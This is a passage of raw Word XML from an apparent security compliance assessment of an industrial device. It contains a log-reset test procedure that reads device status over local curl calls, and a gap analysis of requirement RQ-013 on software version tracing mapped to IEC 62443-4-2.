          <w:p w14:paraId="7F5B5513" w14:textId="4E336C70" w:rsidR="00D90BE6" w:rsidRPr="006E4D50" w:rsidRDefault="004F1D6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power switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="75593B0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09E3A" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18C1F32B" w14:textId="77777777" w:rsidR="00A26FF8" w:rsidRPr="006E4D50" w:rsidRDefault="00A26FF8"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curl (log + uptime read); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C2E85E" w14:textId="2CDF9773" w:rsidR="00D90BE6" w:rsidRPr="006E4D50" w:rsidRDefault="00A26FF8"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power control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="5D6BB3C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B3B9147" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="668167AA" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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18"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ012-02 Cold-start deletion + warm-reset clarification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D72D754" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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./induce_event.sh 1; ./induce_event.sh 2; ./induce_event.sh 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09BB5A94" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC1202_log_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="738EA7EB" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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curl -s http://192.168.0.2/systemtime/systick -o TC1202_tick_pre.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CCDF80" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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 (a) WARM reset (if available) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A71887" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC1202_log_warm.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D64C384" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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 (b) COLD start (power cycle) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DAD7BF1" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006E4D5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curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC1202_log_cold.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73788FFC" w14:textId="77777777" w:rsidR="003543E0" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/systemtime/systick -o TC1202_tick_cold.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3741411D" w14:textId="7338A2AA" w:rsidR="00D90BE6" w:rsidRPr="006868A2"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>diff TC1202_log_pre.json TC1202_log_cold.json | tee TC1202_colddiff.txt # expect: cleared</w:t>
            </w:r>
            <w:commentRangeEnd w:id="18"/>
            <w:r w:rsidR="0043051B" w:rsidRPr="006868A2">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:commentReference w:id="18"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="11B7FDD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DD9724" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32810CB2" w14:textId="77777777" w:rsidR="00EE4AA8" w:rsidRPr="006E4D50" w:rsidRDefault="00EE4AA8"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Cold start → log empty (SRIO-6521), uptime reset (SRIO-15398); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AFC077C" w14:textId="59627DCD" w:rsidR="00D90BE6" w:rsidRPr="006E4D50" w:rsidRDefault="00EE4AA8"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warm-reset behaviour recorded empirically (docs silent).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="32E40FC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A92A448" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46B5434F" w14:textId="68740214" w:rsidR="00D90BE6" w:rsidRPr="006E4D50" w:rsidRDefault="000469E3"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cold start clears log,  Warm-reset behaviour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D90BE6" w:rsidRPr="00EE7A74" w14:paraId="140DA7A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3E3C93" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38560ECB" w14:textId="77777777" w:rsidR="00E47E25" w:rsidRPr="006E4D50" w:rsidRDefault="00E47E25"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TC1202_log_pre/warm/cold.json, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19349B5E" w14:textId="77777777" w:rsidR="00E47E25" w:rsidRPr="006E4D50" w:rsidRDefault="00E47E25"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TC1202_tick_*, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A6DA32" w14:textId="588248ED" w:rsidR="00D90BE6" w:rsidRPr="006E4D50" w:rsidRDefault="00E47E25"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TC1202_colddiff.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AE666D2" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2403715D" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3320C5FE" w14:textId="77777777" w:rsidR="00D90BE6" w:rsidRDefault="00D90BE6" w:rsidP="00D90BE6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3E0310" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E79D2F" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5870DE7C" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C85643" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35ED621E" w14:textId="77777777" w:rsidR="00530E8C" w:rsidRDefault="00530E8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3649BCFE" w14:textId="77777777" w:rsidR="002135BB" w:rsidRDefault="002135BB" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37124CD6" w14:textId="3ECF6B07" w:rsidR="009C0A46" w:rsidRPr="00F51953" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1714F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A7F90"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77BEE934" w14:textId="746DA1BD" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72056560" w14:textId="35DE6FB9" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="00941153">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00525456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall enable a tracing log of the versions of safety software uploaded after the machinery or related product has been placed on the market or put into service, for five years after each upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F0CE2" w14:textId="08EE8657" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 2.8, CR 2.9</w:t>
      </w:r>
      <w:r w:rsidR="000707BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 2.10, CR 2.11, CR 3.9, CR 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E216D" w14:textId="3A5751BD" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="007F5A7B" w:rsidP="006129F2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I (Audit Data); D (Safety Sofware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C053EF1" w14:textId="21C90939" w:rsidR="00941153" w:rsidRPr="00941153" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F256F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(Tampering,) </w:t>
      </w:r>
      <w:r w:rsidR="00941153" w:rsidRPr="00941153">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repudiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB21B04" w14:textId="77777777" w:rsidR="00192CFC" w:rsidRPr="003D4AE9" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DFACE" w14:textId="72D2B5B4" w:rsidR="003D4AE9" w:rsidRPr="003D4AE9" w:rsidRDefault="003D4AE9" w:rsidP="003D4AE9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/deviceinfo/swrevision, /firmware/version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Current version exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B777E" w14:textId="2568FC51" w:rsidR="003D4AE9" w:rsidRPr="003D4AE9" w:rsidRDefault="003D4AE9" w:rsidP="003D4AE9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M0 SOFTWARE_REVISION / I&amp;M5 annotation (SRIO-3002/3023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F401A0" w14:textId="6D8C4C0D" w:rsidR="003D4AE9" w:rsidRPr="003D4AE9" w:rsidRDefault="003D4AE9" w:rsidP="003D4AE9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Release Notes per release (SRIO-16242)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> external, not per-serial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF43B3" w14:textId="6EDF3D11" w:rsidR="003D4AE9" w:rsidRPr="003D4AE9" w:rsidRDefault="003D4AE9" w:rsidP="003D4AE9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SysCom UPDATE_COMPLETED event  (SRIO-10785).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EFA39" w14:textId="25890B68" w:rsidR="00192CFC" w:rsidRPr="00013154" w:rsidRDefault="003D4AE9" w:rsidP="00013154">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remanent audit state exists (REVISION_COUNTER)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Demonstrates the device CAN hold remanent state</w:t>
      </w:r>
      <w:r w:rsidR="00013154">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4AE9">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so a version history is a design omission, not a capability limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CAC8A" w14:textId="77777777" w:rsidR="00563C13" w:rsidRPr="00563C13" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF6482" w14:textId="5702DD21" w:rsidR="00FF0566" w:rsidRPr="00FF0566" w:rsidRDefault="00FF0566" w:rsidP="00FF0566">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0566">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0566">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The device stores only the CURRENT version; there is no append-only, per-device, per-upload version history. It witnesses every upload (UPDATE_COMPLETED) and can hold remanent state, so this is a design omission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397F8DA4" w14:textId="65069187" w:rsidR="00FF0566" w:rsidRPr="00FF0566" w:rsidRDefault="00FF0566" w:rsidP="00FF0566">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0566">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0566">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5 years after each upload’ requires a per-upload absolute timestamp. With no RTC and uptime reset on cold start (the install forces a cold start), the device cannot timestamp an upload at all → even a hypothetical history would be undatable and the per-upload retention clock cannot be started. This is the finding no external record can cure for a specific physical unit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A907E5" w14:textId="0A0371AD" w:rsidR="00FA1D08" w:rsidRPr="00FF0566" w:rsidRDefault="00FF0566" w:rsidP="00FF0566">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0566">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0566">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Not device-resident, not per-serial, not tamper-evident, no guaranteed 5-year per-upload retention, no per-upload timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BF0C1" w14:textId="77777777" w:rsidR="003404D5" w:rsidRDefault="003404D5" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
